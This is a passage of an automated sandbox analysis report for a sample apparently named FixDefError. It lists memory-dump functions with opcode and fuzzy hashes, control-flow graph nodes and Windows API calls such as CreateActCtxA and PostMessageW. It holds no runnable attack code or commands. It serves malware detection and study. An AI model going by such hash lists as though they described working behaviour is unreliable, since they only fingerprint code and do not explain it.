                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: df3599f5dcc8d03bdb928983d3882cfca5dddef37f0c938da4e3e6894e052860
                                                                                                                                                                                                                      • Instruction ID: 5abb7b94cb4d365231fd1c8ef99b2dd32505f0f4c53b343a7b2213a279edc03e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: df3599f5dcc8d03bdb928983d3882cfca5dddef37f0c938da4e3e6894e052860
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A3C18671A04320DFC30ECF28C6C0969BBB1FF55310B868A6AE142DB291D736ED41CB96
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D7534 Relevance: .3, Instructions: 283COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 2f60c6443a5ac833e2a992d39ce48c3f1bba37ad6e3bb68a86b0a0491b4e0fa7
                                                                                                                                                                                                                      • Instruction ID: 3361828c1dc818cfd1229cbdf9bdf97875853d80773234092ca803cf340855c2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f60c6443a5ac833e2a992d39ce48c3f1bba37ad6e3bb68a86b0a0491b4e0fa7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81A1CC30B146548BCB19CB2CC59267EFBF2AFC5318B59C92AD05ADB295C730EC41CB92
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D1E98 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9f490a708d68d7cf0e3891b044a1cf64027994c3ae79ed334970c70d8e47881c
                                                                                                                                                                                                                      • Instruction ID: eaddb0b0ac2312f87c9fe36b13374e916d72791ba2a9472563846baaa59c2047
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9f490a708d68d7cf0e3891b044a1cf64027994c3ae79ed334970c70d8e47881c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AB14271A14221DFC30ECF28C690829BB75FB413007478A6BE522DF6A1C335E915CBA7
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D1903 Relevance: .3, Instructions: 272COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 193abb730e0fe2fe36473d8167aa50026187c84708020028c7a2246f0f0c16b1
                                                                                                                                                                                                                      • Instruction ID: 283e89a793013f147d044ae9f98114c04cbfa299ca8687b289c11a7fc43f26f8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 193abb730e0fe2fe36473d8167aa50026187c84708020028c7a2246f0f0c16b1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AB16571904321DFC30ECF28C690859BBB1FB563047578A6AE082DF291D336E941CB97
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D1B5F Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: db25f621e15f2452805c5113394bceaeb1b23aa99e548f8986085d9e18cce19d
                                                                                                                                                                                                                      • Instruction ID: 6f6d1154a1ec109139b86e8fa8af469d7796ffbc4f2ea1d330adaa897a40d9d9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: db25f621e15f2452805c5113394bceaeb1b23aa99e548f8986085d9e18cce19d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1B15671914321DFC31ECF34C690869BBB1FB11704B878A6AE182DB291D736E945CB97
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D19B5 Relevance: .3, Instructions: 263COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7046eef91d67229a4275b1f72dc5c6745e5f93320fca5f9761697477b9c853ea
                                                                                                                                                                                                                      • Instruction ID: 712eece7ea8673527ef61bab7ff1a6775c386acc4210a281b434975aee93c16a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7046eef91d67229a4275b1f72dc5c6745e5f93320fca5f9761697477b9c853ea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BB16571A04321DFC30ECF38C680869BBB1FB517107878A6AE082DB291D736E945CB97
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D1800 Relevance: .3, Instructions: 262COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 8740ce230cf15d4d05d0fd6228f473066d9a42be822f611a5f4946b547769ee1
                                                                                                                                                                                                                      • Instruction ID: 61dc1eba905d098d5f0fac48fbae2aff395ea7c13c60118dd03aa6f896b9b8eb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8740ce230cf15d4d05d0fd6228f473066d9a42be822f611a5f4946b547769ee1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57B15571A14321DFC30ECF28C6C0869BBB1FB117147878A6AE182DB291D736E945CB97
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D1CD6 Relevance: .3, Instructions: 261COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 0e440bfd691cf3472c2e43a96b904709ae3962f7840d80f1d9737cceb317270c
                                                                                                                                                                                                                      • Instruction ID: 8e875738c0e040cba93478aaa1f763f0a58207a6b138536eca01ac79c8cfb8ad
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0e440bfd691cf3472c2e43a96b904709ae3962f7840d80f1d9737cceb317270c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C3B15471A14321DFC30ECF28C690869BBB1FB517047978A6AE182DF291D336E945CB97
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D17C8 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 5c4acd325e43c7d1bad82100d3321304b9b8410c39b392edc2d6bb56bc5e6d28
                                                                                                                                                                                                                      • Instruction ID: b1f678cea94f6d60ec06d938ce47c69161a3ecdee3458aa892ef4e855adbe7b5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c4acd325e43c7d1bad82100d3321304b9b8410c39b392edc2d6bb56bc5e6d28
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14B14371914321DFC30ECF28C6D0869BBB1FB117147878A6AE182DB2A1D736E945CB97
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D1BAC Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1bbe40e0f836d3443ae857d952efb9620ab81e274747fa8e28c6462c61b82ab1
                                                                                                                                                                                                                      • Instruction ID: b15e326099949d4b0f69bfbb864175392f3d1f2106d133d572186dcab7292146
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bbe40e0f836d3443ae857d952efb9620ab81e274747fa8e28c6462c61b82ab1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9CB13271A14321DFC30ECF28C690869BBB1FB117147878A6AE182DB291D736E945CB97
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D1C47 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 4708a3c3841313f25e19399cece90a993a841fa7043f588c716258d5c0295a20
                                                                                                                                                                                                                      • Instruction ID: a299f09b9915c2550915f402c4148d9485a0e8bdfc5ce9fe4569fc0f38479fcf
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4708a3c3841313f25e19399cece90a993a841fa7043f588c716258d5c0295a20
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0DB15471A14321DFC30ECF38C680869BBB1FB117147878A6AE182DB291D736E945CB97
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D094F Relevance: .2, Instructions: 214COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 8523ae9c8aa6ab63d035e8de5d3c9496980bcd18ca613b25d55075873c5c3872
                                                                                                                                                                                                                      • Instruction ID: 4c7ccf9e297e8c4fc7d88c310d5430b0933f2af3a9e36cadb2e2039fbc9ce15a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8523ae9c8aa6ab63d035e8de5d3c9496980bcd18ca613b25d55075873c5c3872
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2C81DE31E042188FC748CFA9C8949AEBBF2FF98310F51856AE445AB362D735DC01CB92
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D08BC Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: e7c5636fb95e4c29af75b2b1338ea07704dae279863d62400ead5549c80b7d83
                                                                                                                                                                                                                      • Instruction ID: ccf114111b94929514f981a832fb614da3862b7cf56e7c9e1a3b1683db74324b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7c5636fb95e4c29af75b2b1338ea07704dae279863d62400ead5549c80b7d83
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E781DF71E042198FC748CFA8C8949AEBBF2FF98320F11856AE4459B361D7359D46CF92
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D052D Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 1aa096e12768dbd083d267242798268a1abacb7f6414cdcb3b5893a537dcdd63
                                                                                                                                                                                                                      • Instruction ID: 01178c52d9921cb899272517db07a30371bc90d6eadd0583fad064a6b0f13910
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1aa096e12768dbd083d267242798268a1abacb7f6414cdcb3b5893a537dcdd63
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB712571A042098FCB09CFA8C594AAEBBF2FF98310F15856AE045EB352D7359D41CB92
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D073A Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: e8253add067f45f20d3c8b91d0d4ccce42acc23b560c2d02a4670872f8e62377
                                                                                                                                                                                                                      • Instruction ID: 2acdb163130e64b40f2140785c0e94f80b08a1cfe2146b036df21f7c8d28b1c8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e8253add067f45f20d3c8b91d0d4ccce42acc23b560c2d02a4670872f8e62377
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2871CF71E042198FC748CFA9C894AAEBBF2FF98320F11856AE4459B361D735DD05CB92
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D0818 Relevance: .2, Instructions: 196COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: ebc2941f9c04dfe01bb6407e5432462aab6c9f4d0d13bf442a4f056ee7d51199
                                                                                                                                                                                                                      • Instruction ID: 632accec27f04f3b2c1ef6f6f8036503d19cc2d4c456044d241be2083dfcb354
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ebc2941f9c04dfe01bb6407e5432462aab6c9f4d0d13bf442a4f056ee7d51199
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A71EE75E042188FC748CFA8C8949AEBBF2FF98310F11856AE445AB362D735DD05CB92
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D0600 Relevance: .2, Instructions: 186COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6335509427658d30b5676b0fc0b8a287383567af3af976de4be1ecf736e5ddc8
                                                                                                                                                                                                                      • Instruction ID: ff9f3020c1cbc6b7f22f2bcfda568f00327b4917ec884981f5872fd2dadbe7e6
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6335509427658d30b5676b0fc0b8a287383567af3af976de4be1ecf736e5ddc8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A710071E042198FC748CFA8C894AAEBBF2FF98320F11856AE445DB352D7359D01CB92
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D06DD Relevance: .2, Instructions: 175COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: c1fcbf68922025dd6e0d53c3952e39826e3c02ed9c5312e8275dea2f0a2281b0
                                                                                                                                                                                                                      • Instruction ID: e03cb88caf8c42073f90a613e7d53c7baac6e016a9fbf40be5f0c06c8a9406ff
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1fcbf68922025dd6e0d53c3952e39826e3c02ed9c5312e8275dea2f0a2281b0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20612371E042198FCB48CFA8C4546AEBBF2FF98324F11856AE445EB252D7359D05CF92
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D9FDC Relevance: 1.6, APIs: 1, Instructions: 128COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 0 11d9fdc-11d9fe4 1 11d9fe6-11d9fe7 0->1 2 11d9f80-11d9fa9 0->2 4 11d9fe8-11da0a9 CreateActCtxA 1->4 5 11d9fab-11d9fb1 2->5 6 11d9fb2-11d9fd3 2->6 8 11da0ab-11da0b1 4->8 9 11da0b2-11da10c 4->9 5->6 8->9 17 11da10e-11da111 9->17 18 11da11b-11da11f 9->18 17->18 19 11da121-11da12d 18->19 20 11da130 18->20 19->20 22 11da131 20->22 22->22
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 011DA099
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                      • Opcode ID: dff8bb9b71ce8845b97b07e1dc3764eb9708b3288ffba0afa45cd0751acbf56a
                                                                                                                                                                                                                      • Instruction ID: b9e950357fa1b869e398d5b94f0abdf8224cc805f845696af1d88bce7bb594f5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dff8bb9b71ce8845b97b07e1dc3764eb9708b3288ffba0afa45cd0751acbf56a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63512571D00219CEDB24CFA9D8447CEBBF1FF48314F24806AD409AB251D7B5A985CF91
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 011D84CC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 23 11d84cc-11da0a9 CreateActCtxA 26 11da0ab-11da0b1 23->26 27 11da0b2-11da10c 23->27 26->27 34 11da10e-11da111 27->34 35 11da11b-11da11f 27->35 34->35 36 11da121-11da12d 35->36 37 11da130 35->37 36->37 39 11da131 37->39 39->39
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 011DA099
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.285560439.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_11d0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                      • Opcode ID: 6126c10650bb1f0a874f94f111faead64d0283f97c1b4f4b8ae6357e386b3f97
                                                                                                                                                                                                                      • Instruction ID: 49c9bf82c9b9ca9b6d4ee2cc9e6f4cd7abc134766fd09bbe0620c8420711913b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6126c10650bb1f0a874f94f111faead64d0283f97c1b4f4b8ae6357e386b3f97
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B441D2B1D0061CCBDB28DFA9C884BDEBBB5FF48304F24806AD409AB251DBB55985CF91
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 084E5ECC Relevance: 1.5, Strings: 1, Instructions: 297COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.314162004.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_84e0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: <7q
                                                                                                                                                                                                                      • API String ID: 0-2972449820
                                                                                                                                                                                                                      • Opcode ID: 4b568e0a1419f3c77ba0f74a3efd406c27f067dc15bc2928ed6437e44b8fd9d9
                                                                                                                                                                                                                      • Instruction ID: e8511fb01a2632e8422982508f6354e627d4e003c3936590304a2fd7a2de8595
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b568e0a1419f3c77ba0f74a3efd406c27f067dc15bc2928ed6437e44b8fd9d9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C911270A01248DFCB15DFB9D8446AEBFB2EF85312F1584AEE445AB752CB349805CB61
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 09DE2C59 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 102 9de2c59-9de2cca PostMessageW 103 9de2ccc-9de2cd2 102->103 104 9de2cd3-9de2ce7 102->104 103->104
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • PostMessageW.USER32(?,?,?,?), ref: 09DE2CBD
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.327813357.0000000009DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09DE0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9de0000_FixDefError.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessagePost
                                                                                                                                                                                                                      • String ID:
